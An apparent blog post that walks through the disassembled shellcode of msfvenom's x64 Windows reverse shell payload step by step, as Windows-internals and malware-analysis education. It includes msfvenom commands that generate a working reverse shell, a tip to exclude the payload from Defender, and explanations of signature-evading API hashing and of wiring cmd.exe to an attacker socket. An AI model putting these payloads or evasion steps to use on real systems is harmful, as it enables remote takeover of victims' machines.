Analyzing msfvenom's reverse shell payload - Windows
This is my attempt at reverse engineering the shellcode used in msfvenom's x64 reverse shell payload on Windows, and describing how it works.
In this post, I will step through the shellcode used in msfvenom’s stageless reverse shell payload on Windows. While stepping through the shellcode I will explain the different mechanics and system internals used in the shellcode, and try to break it down as simply as possible. By the end of this post, you’ll have a better grasp of Windows internals, common antivirus evasion techniques, as well as a respect for the shellcode craft.
Disclaimer: I did use Anthropic’s Claude to assist in deciphering some parts of the shellcode I analyzed in this post. I did take the effort to validate Claude’s claims, and did not use Claude to generate any content in this post.
Prerequisites
Knowledge
This article assumes you have basic knowledge in assembly, C programming, and Windows System Internals. Where relevant, I’ll try to introduce concepts briefly, but a working familiarity with these topics will make the reading smoother.
Shellcode
As the title mentions, I’m using msfvenom to generate the shellcode I’m analyzing. msfvenom is a free tool offered in the Metasploit Framework. I use the objdump command in Linux to convert the shellcode into assembly instructions.
# generate windows reverse shell code in binary format
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f raw -o revshell.bin
# disassemble the shellcode into human-readable assembly instructions
objdump -D -b binary -M intel -m i386:x86-64 revshell.bin
Rather than reproducing the full shellcode here, I’ll walk through it snippet by snippet so that the focus stays on the analysis. Feel free to generate the shellcode yourself and follow along.
(Optional) Windows 11 VM & WinDbg
I’ve set up a Windows 11 VM to run the shellcode in a debugger. Since Defender has signatures for stock msfvenom payloads like this one, you’ll need to add a Defender exclusion for the directory where you plan to store the msfvenom executable. Otherwise, Defender will flag and delete the executable the second it touches the disk.
While analyzing the shellcode, I used WinDbg to help step through some of the instructions. This helped me develop a better understanding of how the shellcode operates. To generate a working payload to run in WinDbg, I had msfvenom create an executable instead of outputting the payload in raw binary format (like I did in the shellcode section).
# generate windows reverse shell executable to run in WinDbg
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 -f exe -o revshell.exe
Shellcode analysis
Part 1 - Initial setup
0: fc cld
1: 48 83 e4 f0 and rsp,0xfffffffffffffff0
5: e8 c0 00 00 00 call 0xca
The first few instructions set the shellcode up for execution. We first clear the direction flag in EFLAGS (setting it to 0), forcing string instructions to process data forward (from low to high addresses).
The next instruction aligns the stack to a 16-byte boundary by clearing the low four bits of rsp. The Windows x64 calling convention expects the stack to be 16-byte aligned at call sites, and API code that uses aligned SSE instructions can crash if it isn’t.
The last instruction transfers execution to 0xca and, as a side effect, pushes the address of the instruction that follows it (0xa) onto the stack. I’ll cover the significance of this in part 3.
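To make the alignment step concrete, here is a minimal Python sketch of what the and instruction does to the stack pointer. The sample rsp values are made up for illustration and do not come from a real debugging session.

```python
MASK = 0xFFFFFFFFFFFFFFF0  # same immediate as `and rsp,0xfffffffffffffff0`


def align_down_16(rsp: int) -> int:
    """Clear the low four bits, rounding rsp down to a multiple of 16."""
    return rsp & MASK


# Hypothetical stack pointer values, chosen only to show the rounding.
for rsp in (0x14FF28, 0x14FF20, 0x14FF2F):
    print(hex(rsp), "->", hex(align_down_16(rsp)))
```

Rounding down rather than up is the safe direction here: the stack grows toward lower addresses, so the adjustment only ever reserves a few extra bytes.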
Part 2 - Function address lookup
This function is the meat and potatoes of the shellcode. Without it, we wouldn’t be able to call functions within the Windows API or load additional libraries as needed. It is also the most in-depth part of our analysis, since we’ll also be covering some of the essential parts of how Windows processes and executables operate.
2.1: Stage 1 - PEB walking & API hashing
In this stage, we’ll parse the Process Environment Block (PEB), and grab the list of modules (DLLs) loaded into the process from the Loader Data (Ldr). One at a time, we’ll load a DLL name and ROR-13 hash it to be sent off to Stage 2. The following diagram shows the flow of this process.
2.1.1: Save register values
a: 41 51 push r9
c: 41 50 push r8
e: 52 push rdx
f: 51 push rcx
10: 56 push rsi
11: 48 31 d2 xor rdx,rdx
These first few instructions are pretty simple. Push all the values from the registers we plan to use to the stack, so the registers can be restored to their previous state when the function ends. Lastly, zero out rdx.
2.1.2: Load first DLL name from the Ldr
14: 65 48 8b 52 60 mov rdx,QWORD PTR gs:[rdx+0x60]
19: 48 8b 52 18 mov rdx,QWORD PTR [rdx+0x18]
1d: 48 8b 52 20 mov rdx,QWORD PTR [rdx+0x20]
21: 48 8b 72 50 mov rsi,QWORD PTR [rdx+0x50]
25: 48 0f b7 4a 4a movzx rcx,WORD PTR [rdx+0x4a]
In Windows x64 assembly, gs is a segment register (the x86 equivalent is fs). Its base address points to the TEB (Thread Environment Block). From the TEB we can read the pointer to the PEB (Process Environment Block), giving us access to information about the currently running process. This includes a list of the modules loaded into the process (the executable itself and its DLLs). The following diagram attempts to visualize how this structure is laid out.
Diagram 2: How the shellcode accesses the PEB, Ldr, and InMemoryOrderModuleList structures.
The first three assembly instructions load an address pointing to our first DLL from the Ldr into the rdx register. From there, we retrieve the BaseDllName and its max length into the rsi and rcx registers using the last two instructions.
This technique is known as PEB walking. It’s commonly used by malicious processes to look up functions in memory since, unlike a normal PE (Portable Executable), shellcode doesn’t have a PE header or import table to reference when looking up functions.
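The five loads can be replayed against a fake address space in Python. This is only a sketch: the addresses, the single module entry, and the helper names are made up for illustration, and only the offsets (0x60, 0x18, 0x20, 0x50, 0x4a) come from the shellcode.

```python
import struct

mem = bytearray(0x1000)  # fake address space; an "address" is an offset into it


def write_q(addr, value):
    struct.pack_into("<Q", mem, addr, value)


def read_q(addr):
    return struct.unpack_from("<Q", mem, addr)[0]


def read_w(addr):
    return struct.unpack_from("<H", mem, addr)[0]


# Hypothetical addresses for the structures involved.
TEB, PEB, LDR, ENTRY, NAME = 0x100, 0x200, 0x300, 0x400, 0x500
LINKS = ENTRY + 0x10  # InMemoryOrderLinks sits 0x10 bytes into the Ldr entry

name = "KERNEL32.DLL".encode("utf-16-le") + b"\x00\x00"
mem[NAME:NAME + len(name)] = name

write_q(TEB + 0x60, PEB)     # TEB -> PEB
write_q(PEB + 0x18, LDR)     # PEB -> Ldr
write_q(LDR + 0x20, LINKS)   # Ldr -> first InMemoryOrderModuleList entry
write_q(LINKS + 0x50, NAME)  # BaseDllName buffer pointer
struct.pack_into("<H", mem, LINKS + 0x4A, len(name))  # BaseDllName max length

# The same five loads the shellcode performs.
rdx = read_q(TEB + 0x60)  # mov rdx,QWORD PTR gs:[rdx+0x60]
rdx = read_q(rdx + 0x18)  # mov rdx,QWORD PTR [rdx+0x18]
rdx = read_q(rdx + 0x20)  # mov rdx,QWORD PTR [rdx+0x20]
rsi = read_q(rdx + 0x50)  # mov rsi,QWORD PTR [rdx+0x50]
rcx = read_w(rdx + 0x4A)  # movzx rcx,WORD PTR [rdx+0x4a]

dll_name = bytes(mem[rsi:rsi + rcx]).decode("utf-16-le").rstrip("\x00")
print(dll_name, rcx)
```

Note that rdx ends up pointing at the list links inside the entry rather than at the start of the entry, which is why the name fields appear at 0x50 and 0x4a instead of their offsets from the start of the structure.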
2.1.3: Hash the BaseDllName and go to Stage 2
2a: 4d 31 c9 xor r9,r9
2d: 48 31 c0 xor rax,rax
30: ac lods al,BYTE PTR [rsi]
31: 3c 61 cmp al,0x61
33: 7c 02 jl 0x37
35: 2c 20 sub al,0x20
37: 41 c1 c9 0d ror r9d,0xd
3b: 41 01 c1 add r9d,eax
3e: e2 ed loop 0x2d
Next we’ll zero out the r9 and rax registers. After that, we use the lods instruction to load a single byte of the name into the al register (lower 8 bits of rax register). lods also advances rsi by one (forward, because we cleared the direction flag in part 1), so each pass picks up the next byte. The loop instruction at 0x3e decrements rcx and jumps back to 0x2d until rcx reaches zero, so the loop runs once for every byte counted by the max length we loaded earlier. Because BaseDllName is a UTF-16 string, that includes the zero high byte of each character and the null terminator.
Once we’ve loaded our byte into the al register, we check whether it is 0x61 (‘a’) or higher. If so, we subtract 0x20 from it (sub al,0x20), which upper-cases the lower-case letters a-z. This is to eliminate varying naming conventions (i.e. kernel32.dll == Kernel32.Dll == KERNEL32.DLL).
Lastly, we’ll use the ror instruction to rotate the bits in the r9d register (lower 32 bits of r9 register) right by 13 positions (0xd). Once rotated, we’ll add the byte stored in the al register to our hash stored in the r9 register (to match register sizes, r9d and eax are used).
This technique is referred to as ROR-13 hashing. It is used to hide library function names within shellcode and memory, making it harder for antivirus and EDR solutions to statically detect and signature common Windows API functions used in malware.
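Here is a small Python sketch of the stage 1 loop. The function names are my own; the logic mirrors the instructions from 0x2d to 0x3e, assuming the name is stored as UTF-16 and the max length covers the null terminator.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by count bits."""
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def hash_module_name(name: str) -> int:
    """Hash a DLL name the way the loop at 0x2d-0x3e does."""
    data = (name + "\x00").encode("utf-16-le")  # terminator is counted too
    result = 0
    for byte in data:
        if 0x61 <= byte <= 0x7F:  # cmp al,0x61 / jl (signed, so 0x80+ is skipped)
            byte -= 0x20          # sub al,0x20
        result = ror32(result, 13)              # ror r9d,0xd
        result = (result + byte) & 0xFFFFFFFF   # add r9d,eax
    return result


print(hex(hash_module_name("kernel32.dll")))
print(hash_module_name("kernel32.dll") == hash_module_name("KERNEL32.DLL"))
```

Because every byte is rotated into the running value, two names only collide if their whole byte sequence hashes the same, which is good enough for telling a handful of loaded DLLs apart.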
2.2: Stage 2 - PE export table walking
This section walks over the functions of a DLL, hashing each function name and comparing it to the function hash supplied in the r10 register. If a matching function name cannot be found, it will step to the next DLL in the Ldr and jump back to stage 1. The following diagram highlights the process flow of stage 2:
2.2.1: Load the export directory
40: 52 push rdx
41: 41 51 push r9
43: 48 8b 52 20 mov rdx,QWORD PTR [rdx+0x20]
47: 8b 42 3c mov eax,DWORD PTR [rdx+0x3c]
4a: 48 01 d0 add rax,rdx
4d: 8b 80 88 00 00 00 mov eax,DWORD PTR [rax+0x88]
53: 48 85 c0 test rax,rax
56: 74 67 je 0xbf
The first two instructions save the Ldr entry and BaseDllName’s hash to the stack for later use. Following that, the base address of the DLL is loaded into the rdx register, and the offset of the PE (Portable Executable) Header (the e_lfanew field at offset 0x3c of the DLL) is loaded into the eax register (lower 32 bits of rax register). The two registers are then added together in the rax register to provide the address of the PE Header.
After that, the Export Directory’s RVA (Relative Virtual Address), found at offset 0x88 from the PE Header, is loaded into the eax register, and rax is tested against itself. If the DLL has no Export Directory, this RVA is 0.
If the Export Directory is empty, the code will jump to 0xbf. This is where we step to the next DLL in our list and jump back to stage 1.
The following diagram displays the PE Format, and how it pertains to this stage of the address lookup function.
Diagram 4: The PE Format and the function table within the Export Directory.
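The two header lookups can be sketched in Python against a synthetic image. The buffer, the header position, and the RVA below are invented for the example; only the 0x3c and 0x88 offsets come from the shellcode. For a 64-bit PE, 0x88 is the 4-byte signature plus the 20-byte file header plus 0x70 bytes of optional header before the first data directory entry.

```python
import struct

image = bytearray(0x200)  # stand-in for a mapped DLL; base address is offset 0
E_LFANEW = 0x80           # hypothetical position of the PE header
EXPORT_RVA = 0x1000       # hypothetical Export Directory RVA

image[0:2] = b"MZ"
struct.pack_into("<I", image, 0x3C, E_LFANEW)
image[E_LFANEW:E_LFANEW + 4] = b"PE\x00\x00"
struct.pack_into("<I", image, E_LFANEW + 0x88, EXPORT_RVA)


def export_directory_rva(img) -> int:
    """Follow the same two reads the shellcode uses to find the export RVA."""
    pe_header = struct.unpack_from("<I", img, 0x3C)[0]         # mov eax,[rdx+0x3c]
    return struct.unpack_from("<I", img, pe_header + 0x88)[0]  # mov eax,[rax+0x88]


rva = export_directory_rva(image)
print(hex(rva) if rva else "no export directory")
```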
2.2.2: Prepare AddressOfNames[] array
58: 48 01 d0 add rax,rdx
5b: 50 push rax
5c: 8b 48 18 mov ecx,DWORD PTR [rax+0x18]
5f: 44 8b 40 20 mov r8d,DWORD PTR [rax+0x20]
63: 49 01 d0 add r8,rdx
66: e3 56 jrcxz 0xbe
Since the rax register is only an RVA for the Export Directory, we’ll need to add it to the base address for the DLL (rdx register). This is what the first instruction accomplishes, storing the sum in the rax register. Immediately after, we save the rax register to the stack.
We then prepare the AddressOfNames[] array. First, we’ll store the number of names in the array in the ecx register (lower 32 bits of rcx register), and then store the RVA of the array in the r8d register (lower 32 bits of r8 register). We then add the DLL’s base address (rdx register) to r8, which gives us the address of the AddressOfNames[] array.
The final instruction, jrcxz, checks if the rcx register’s value equals zero. If so, it will jump to 0xbe where it prepares to load the next DLL, since there are no functions to iterate over. If it’s not zero, then we continue on.
2.2.3: Iterate over the AddressOfNames[] array and compare to the supplied function hash
66: e3 56 jrcxz 0xbe
68: 48 ff c9 dec rcx
6b: 41 8b 34 88 mov esi,DWORD PTR [r8+rcx*4]
6f: 48 01 d6 add rsi,rdx
72: 4d 31 c9 xor r9,r9
75: 48 31 c0 xor rax,rax
78: ac lods al,BYTE PTR [rsi]
79: 41 c1 c9 0d ror r9d,0xd
7d: 41 01 c1 add r9d,eax
80: 38 e0 cmp al,ah
82: 75 f1 jne 0x75
84: 4c 03 4c 24 08 add r9,QWORD PTR [rsp+0x8]
89: 45 39 d1 cmp r9d,r10d
8c: 75 d8 jne 0x66
I’ve included the last instruction from the previous section (jrcxz 0xbe), since it plays a role in the loop covered in this section. The next instruction decrements the value in the rcx register by one. Essentially, this loop is going over the AddressOfNames[] array backwards.
We begin our loop by grabbing the RVA pointer of the next function name, and moving it into the esi register (lower 32 bits of rsi register). We then add the RVA to the DLL’s base address, and store it in the rsi register. Next we ROR-13 hash the function name in the rsi register and place the hash in the r9 register like we did in stage 1 with the BaseDllName. Unlike stage 1, there is no upper-casing and no length counter. Instead, cmp al,ah compares the byte we just loaded against ah, which is still zero, so the loop ends once the null-byte terminator (end of string indicator) has been hashed.
Once the function name has been hashed, we then combine it with the BaseDllName hash we stored on the stack at the beginning of stage 2 and store it in the r9 register. Finally, we compare this newly calculated hash with the hash provided in the r10 register (r9d and r10d are used to compare the lower 32 bits of r9 and r10 registers).
If the hash doesn’t match, we jump back to the beginning of our loop at 0x66, and once again check if the value in the rcx register is zero. Otherwise, we continue on and retrieve the matching function’s address from the AddressOfFunctions[] array.
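To tie both stages together, here is a hedged Python sketch that combines the DLL name hash and the function name hash the way the add at 0x84 does. The helper names are mine. It assumes the DLL name is hashed as upper-cased UTF-16 with its terminator, and the function name as plain ASCII with its terminator.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF


def hash_bytes(data, uppercase=False):
    """ROR-13 hash over raw bytes, optionally upper-casing like stage 1."""
    result = 0
    for byte in data:
        if uppercase and 0x61 <= byte <= 0x7F:
            byte -= 0x20
        result = (ror32(result, 13) + byte) & 0xFFFFFFFF
    return result


def api_hash(module: str, function: str) -> int:
    """Combined hash compared against r10d at 0x89."""
    module_hash = hash_bytes((module + "\x00").encode("utf-16-le"), uppercase=True)
    function_hash = hash_bytes(function.encode("ascii") + b"\x00")
    return (module_hash + function_hash) & 0xFFFFFFFF  # add r9,[rsp+0x8]


print(hex(api_hash("kernel32.dll", "LoadLibraryA")))
```

Adding the DLL hash means the same function name exported by two different DLLs produces two different values, so a single 32-bit constant identifies both the library and the function.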
2.2.4: Retrieve address for matched function
8e: 58 pop rax
8f: 44 8b 40 24 mov r8d,DWORD PTR [rax+0x24]
93: 49 01 d0 add r8,rdx
96: 66 41 8b 0c 48 mov cx,WORD PTR [r8+rcx*2]
9b: 44 8b 40 1c mov r8d,DWORD PTR [rax+0x1c]
9f: 49 01 d0 add r8,rdx
a2: 41 8b 04 88 mov eax,DWORD PTR [r8+rcx*4]
a6: 48 01 d0 add rax,rdx
Once a matching hash is found, our next step is to use the index stored in the rcx register to retrieve the ordinal from the AddressOfNameOrdinals[] array, which in turn is the index of the function’s address in the AddressOfFunctions[] array. The first 4 instructions do just this, loading the AddressOfNameOrdinals[] base address into the r8 register and assigning the ordinal we’re looking for to the cx register (lower 16 bits of rcx register).
We then load the AddressOfFunctions[] array’s base address into the r8 register and retrieve the RVA for our hashed function and store it in the eax register (lower 32 bits of rax register). The final instruction takes the function’s RVA and adds it to the DLL’s base address, storing our function’s base address in the rax register.
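The name to ordinal to address chain is easier to see with plain lists. In this sketch the DLL base, the export names, and the RVAs are all invented, and names are compared directly where the shellcode compares hashes.

```python
# Hypothetical export tables for a DLL mapped at a made-up base address.
DLL_BASE = 0x7FF800000000
address_of_names = ["Alpha", "Beta", "Gamma"]
address_of_name_ordinals = [2, 0, 1]             # parallel to the names array
address_of_functions = [0x1100, 0x1200, 0x1300]  # RVAs, indexed by ordinal


def resolve(wanted: str):
    """Walk the names backwards and map the match to a function address."""
    rcx = len(address_of_names)  # number of names
    while rcx:                   # jrcxz 0xbe
        rcx -= 1                 # dec rcx
        if address_of_names[rcx] == wanted:          # shellcode compares hashes
            ordinal = address_of_name_ordinals[rcx]  # mov cx,[r8+rcx*2]
            rva = address_of_functions[ordinal]      # mov eax,[r8+rcx*4]
            return DLL_BASE + rva                    # add rax,rdx
    return None  # no match: the shellcode moves on to the next DLL


print(hex(resolve("Beta")))
```

The extra hop through the ordinals array matters because the names array and the functions array are not ordered the same way, so the name index cannot be used on the functions array directly.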
2.2.5: Call the matched function
a9: 41 58 pop r8
ab: 41 58 pop r8
ad: 5e pop rsi
ae: 59 pop rcx
af: 5a pop rdx
b0: 41 58 pop r8
b2: 41 59 pop r9
b4: 41 5a pop r10
b6: 48 83 ec 20 sub rsp,0x20
ba: 41 52 push r10
bc: ff e0 jmp rax
The first two instructions delete the values pushed to the stack in the beginning of stage 2.
Instructions 0xad to 0xb2 restore the values to the registers that we pushed to the stack in the beginning of stage 1.
From part 3 onwards, you’ll see a recurring function call, call rbp. That is calling this function we’ve been covering in part 2. When you use the call instruction in assembly, it saves the next instruction’s pointer address to the stack so the function we’re calling knows where to return execution when it’s finished. It then jumps to the address in the operand. Instruction 0xb4 pops this return address off the stack and into the r10 register.
Then we reserve 32 bytes on the stack (the shadow space that the Windows x64 calling convention requires a caller to provide), push the return address back to the stack, and jump to the function address we found in the AddressOfFunctions[] array. Together, the push and jmp mimic the call instruction described in the last paragraph, so the API function returns directly to the code that executed call rbp.
2.2.6: Jump point for preparing to go back to stage 1
be: 58 pop rax
bf: 41 59 pop r9
c1: 5a pop rdx
c2: 48 8b 12 mov rdx,QWORD PTR [rdx]
c5: e9 57 ff ff ff jmp 0x21
This last part is used to prepare our jump back to stage 1. The first two instructions delete the last two values we pushed to the stack (since the rax and r9 registers get zeroed-out in stage 1).
Now we restore the Ldr entry we saved in the beginning of stage 2 back to the rdx register. We then move the pointer address stored in the flink located in our current Ldr entry (refer to Diagram 2), pointing to our next DLL, into the rdx register and jump back down to stage 1 to hash and search again.
Part 3 - Connect to attacker machine (via Winsock)
In this part, we’ll configure Winsock and set up a reverse TCP connection to our attacker machine.
3.1: Configure rbp to point to address lookup function
5: e8 c0 00 00 00 call 0xca
a: 41 51 push r9
...
ca: 5d pop rbp
I’ve included the instructions at 0x5 and 0xa. What the call instruction at 0x5 did was push 0xa, the address of the instruction right after it, to the stack. This is the pointer for our address lookup function we covered in part 2. The pop rbp at 0xca takes that address back off the stack and assigns it to the rbp register.
The rbp register is normally used to hold the base of the current stack frame, but here we’ll be using it as a placeholder for the address we use to call our function from part 2.
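The arithmetic behind this call and pop trick fits in a few lines of Python. This is just a model: the list stands in for the stack, and the offsets are relative to the start of the shellcode rather than real addresses.

```python
CALL_OFFSET = 0x05  # where the call instruction sits
CALL_LENGTH = 5     # opcode e8 plus a 4-byte relative displacement
TARGET = 0xCA       # the pop rbp instruction

return_address = CALL_OFFSET + CALL_LENGTH             # what call pushes
displacement = (TARGET - return_address) & 0xFFFFFFFF  # encoded after e8

stack = [return_address]  # call pushes the address of the next instruction
rbp = stack.pop()         # pop rbp at 0xca takes it straight back off

print(hex(return_address), hex(displacement), hex(rbp))
```

Shellcode has no fixed load address, so it cannot hard-code a pointer to its own lookup function. Letting call push the address and popping it again is a compact way to learn that address at run time.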
3.2: Create SOCKADDR_IN struct & call LoadLibraryA(“ws2_32”)
cb: 49 be 77 73 32 5f 33 movabs r14,0x32335f327377
d2: 32 00 00
d5: 41 56 push r14
d7: 49 89 e6 mov r14,rsp
da: 48 81 ec a0 01 00 00 sub rsp,0x1a0
e1: 49 89 e5 mov r13,rsp
e4: 49 bc 02 00 11 5c 7f movabs r12,0x100007f5c110002
eb: 00 00 01
ee: 41 54 push r12
f0: 49 89 e4 mov r12,rsp
f3: 4c 89 f1 mov rcx,r14
f6: 41 ba 4c 77 26 07 mov r10d,0x726774c
fc: ff d5 call rbp
We will now move the string 0x32335f327377 (converts to “ws2_32\0”) into the r14 register. This string is the name used when importing the Winsock library. We’ll need this library’s functions to connect a shell process back to our attacker machine.
Now we’ll push the r14 register to the stack, then move the stack pointer (pointing to our string) back into the r14 register. We do this because the argument for LoadLibraryA requires a pointer to a string, which this technically is.
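A quick way to convince yourself that the immediate really is the library name is to pack and unpack it in Python. This sketch only uses the constant from the disassembly.

```python
import struct

raw = b"ws2_32\x00\x00"              # padded to fill one 8-byte register
imm = int.from_bytes(raw, "little")  # value loaded by movabs r14,...
print(hex(imm))

# push r14 writes those 8 bytes back to memory in little-endian order,
# so the stack ends up holding an ordinary null-terminated C string.
on_stack = struct.pack("<Q", imm)
c_string = on_stack.split(b"\x00", 1)[0].decode("ascii")
print(c_string)
```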
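We then grow our stack by 416 bytes (0x1a0), and copy our new stack pointer into the r13 register. This region will later hold the WSADATA structure.
Next, we load the first eight bytes of our SOCKADDR_IN structure (address family, port, and IP address) into the r12 register as a single value. Our struct looks something like this in memory: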
Diagram 5: SOCKADDR_IN structure.
Address family is stored in memory as little-endian, like most other values in x86 architecture. This equals out to AF_INET (0x0002), and should always be AF_INET.
Since port and IP address are used by the network stack, they need to be stored in memory as big-endian. It is confusing to decipher at first, but easier as you become more familiar with it.
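If the mixed byte orders are hard to follow, decoding the constant in Python may help. This sketch unpacks the value from the movabs at 0xe4 field by field. The field names follow the usual sockaddr_in naming and are not visible in the shellcode itself.

```python
import socket
import struct

imm = 0x0100007F5C110002      # immediate from movabs r12,...
raw = struct.pack("<Q", imm)  # bytes in the order they land on the stack

family = struct.unpack_from("<H", raw, 0)[0]  # sin_family, little-endian
port = struct.unpack_from(">H", raw, 2)[0]    # sin_port, big-endian
address = socket.inet_ntoa(raw[4:8])          # sin_addr, big-endian

print(family, port, address)
```

The port comes out as msfvenom’s default LPORT, since the command used to generate the payload only set LHOST.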
Like our “ws2_32” string in the r14 register, we’ll push the r12 register holding our SOCKADDR_IN structure to the stack and move the stack pointer into the r12 register. This creates a pointer to our SOCKADDR_IN structure.
We’ll now move the pointer to our “ws2_32” string in the r14 register into the rcx register, since rcx holds the first argument for a function. Then we’ll move the hash 0x726774c into the r10d register (lower 32 bits of r10 register). This hash is the ROR-13 hash of the LoadLibraryA function.
Finally, we call our address lookup function. This will match our hash for LoadLibraryA, find its address in memory, then jump to it with a pointer to our “ws2_32” string as the only argument in the rcx register.
3.3: Call WSAStartup()
fe: 4c 89 ea mov rdx,r13
101: 68 01 01 00 00 push 0x101
106: 59 pop rcx
107: 41 ba 29 80 6b 00 mov r10d,0x6b8029
10d: ff d5 call rbp
In the last section, we grew the stack by 416 bytes and copied the stack pointer into the r13 register. We will now move this pointer into the rdx register. Then we will push the value 0x101 to the stack, and immediately pop it into the rcx register.
Now it’s time for us to load the hash for the WSAStartup function into the r10d register (lower 32 bits of the r10 register) and call the function.
The first argument (rcx register) of the WSAStartup function uses a WORD value to specify which Windows Sockets version should be used. The higher byte stores the minor version number and the lower byte stores the major version number. In our shellcode, we are loading version 1.1 of Windows Sockets.
The second argument (rdx register) is the pointer address where WSAStartup will store the WSADATA structure on the stack. This will hold information necessary for utilizing the Windows Sockets API.
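The version word is easy to build and take apart by hand. The helper below is a Python stand-in for the Windows MAKEWORD macro, written for this post.

```python
def make_word(low: int, high: int) -> int:
    """Combine two bytes into a 16-bit word, low byte first."""
    return ((high & 0xFF) << 8) | (low & 0xFF)


requested = make_word(1, 1)  # major 1 in the low byte, minor 1 in the high byte
major, minor = requested & 0xFF, requested >> 8
print(hex(requested), f"{major}.{minor}")
```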
3.4: Call WSASocketA()
10f: 50 push rax
110: 50 push rax
111: 4d 31 c9 xor r9,r9
114: 4d 31 c0 xor r8,r8
117: 48 ff c0 inc rax
11a: 48 89 c2 mov rdx,rax
11d: 48 ff c0 inc rax
120: 48 89 c1 mov rcx,rax
123: 41 ba ea 0f df e0 mov r10d,0xe0df0fea
129: ff d5 call rbp
We will now create the socket for our network connection using the WSASocketA function. This function takes six arguments, and only the first four are passed in registers (rcx, rdx, r8, and r9), so we’ll need to utilize the stack to handle the last two arguments.
At this point, the rax register should equal 0x0, since WSAStartup returns zero on success. The first instruction will set the dwFlags argument to 0x0, meaning no flags will be set. The second instruction sets the g argument to 0x0 as well, meaning no group operations are performed. We utilize the stack to pass these arguments to the WSASocketA function. Since the stack is LIFO (Last In First Out) we need to push the dwFlags argument first, since it is the last argument. Then we’ll push the g argument.
Next we will zero-out the r8 and r9 registers. This will set the protocol and lpProtocolInfo arguments to NULL. We then increment the rax register and assign that value to rdx register, equaling 0x1. This will set the type argument to SOCK_STREAM. We once again increment the rax register and assign that value to rcx register, equaling 0x2. This will set the af argument to AF_INET.
Once this is all set, we now load the hash for the WSASocketA function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function should return a handle for the new socket in the rax register.
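The split between registers and stack follows the Windows x64 calling convention, which this Python sketch models. The helper is hypothetical, and the stack offsets are relative to rsp at the moment a normal call instruction would execute, with the 32 bytes of shadow space coming first. In this shellcode the lookup function reserves that shadow space itself, so the two values pushed before call rbp end up in those two slots.

```python
REGISTERS = ["rcx", "rdx", "r8", "r9"]


def place_arguments(args):
    """Map (name, value) pairs to registers, then to stack slots."""
    placement = {}
    for index, (name, value) in enumerate(args):
        if index < 4:
            where = REGISTERS[index]
        else:
            # Stack arguments sit just above the 0x20 bytes of shadow space.
            where = f"[rsp+{0x20 + 8 * (index - 4):#x}]"
        placement[name] = (where, value)
    return placement


wsa_socket_args = [
    ("af", 2),              # AF_INET
    ("type", 1),            # SOCK_STREAM
    ("protocol", 0),
    ("lpProtocolInfo", 0),  # NULL
    ("g", 0),
    ("dwFlags", 0),
]

for name, (where, value) in place_arguments(wsa_socket_args).items():
    print(f"{name:15} {where:12} {value}")
```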
3.5: Connect to the attacker host
12b: 48 89 c7 mov rdi,rax
12e: 6a 10 push 0x10
130: 41 58 pop r8
132: 4c 89 e2 mov rdx,r12
135: 48 89 f9 mov rcx,rdi
138: 41 ba 99 a5 74 61 mov r10d,0x6174a599 <- connect()
13e: ff d5 call rbp
First, we move the socket handle returned by the last function into the rdi register. We then load 0x10 (16 in decimal) into the r8 register. This will serve as the length of our SOCKADDR_IN structure. Then we will move the pointer to our SOCKADDR_IN structure (r12 register) into the rdx register, and move our socket handle into the rcx register.
Then we will load the hash for the Winsock connect function into the r10d register (lower 32 bits of the r10 register) and call the function. If no errors occurred, the function will return zero.
Part 4 - Spawn a shell
In this part, we spawn a cmd.exe shell with STDIN/STDOUT/STDERR pointing to our socket handle. We then wait for the newly created process to terminate and gracefully exit our shellcode.
4.1: Call CreateProcessA() to open cmd.exe
140: 48 81 c4 40 02 00 00 add rsp,0x240
147: 49 b8 63 6d 64 00 00 movabs r8,0x646d63
14e: 00 00 00
151: 41 50 push r8
153: 41 50 push r8
155: 48 89 e2 mov rdx,rsp
158: 57 push rdi
159: 57 push rdi
15a: 57 push rdi
15b: 4d 31 c0 xor r8,r8
15e: 6a 0d push 0xd
160: 59 pop rcx
161: 41 50 push r8
163: e2 fc loop 0x161
165: 66 c7 44 24 54 01 01 mov WORD PTR [rsp+0x54],0x101
16c: 48 8d 44 24 18 lea rax,[rsp+0x18]
171: c6 00 68 mov BYTE PTR [rax],0x68
174: 48 89 e6 mov rsi,rsp
177: 56 push rsi
178: 50 push rax
179: 41 50 push r8
17b: 41 50 push r8
17d: 41 50 push r8
17f: 49 ff c0 inc r8
182: 41 50 push r8
184: 49 ff c8 dec r8
187: 4d 89 c1 mov r9,r8
18a: 4c 89 c1 mov rcx,r8
18d: 41 ba 79 cc 3f 86 mov r10d,0x863fcc79 <- CreateProcessA()
193: ff d5 call rbp
This is gonna be a long and in-depth section, so I’ll hop right into it. First thing we do is shrink our stack. This will give us a clean slate to work with, while also keeping any necessary structures still in place. Then we’ll move the string “cmd\0” into the r8 register, setting the remaining bytes in the register to 0x00. We then push the string in the r8 register to the stack twice. Once for somewhere to reference via a pointer, and another time to add padding. We then move the string’s address to the rdx register. We will use the “cmd” string to tell CreateProcessA that we want to open a cmd.exe shell.
Next, we’re going to work on creating our STARTUPINFO and PROCESS_INFORMATION structures on the stack. We start by taking our socket handle stored in the rdi register, and pushing it to the stack three times. These will act as our STDIN, STDOUT, and STDERR handles in the STARTUPINFO structure. This means we’ll be receiving all input from and sending all output and errors to our attacker machine via our reverse TCP connection.
Now, we’re going to provision the rest of our STARTUPINFO and PROCESS_INFORMATION structure’s memory on the stack. We do this by zeroing out the r8 register. Next we set the rcx register to 0xd (13 in decimal). We’ll then push the r8 register to the stack 13 times with the loop instruction. What this does is push 13 QWORDs (104 bytes) worth of null-bytes to the stack.
With the three handles we’ve already pushed to the stack, as well as 104 null-bytes we’ve provisioned on the stack, this represents the STARTUPINFO and PROCESS_INFORMATION structures. To get a better understanding of what this looks like in memory, please refer to Diagram 6 below:
Diagram 6: How PROCESS_INFORMATION and STARTUPINFO structures are laid out in the stack.
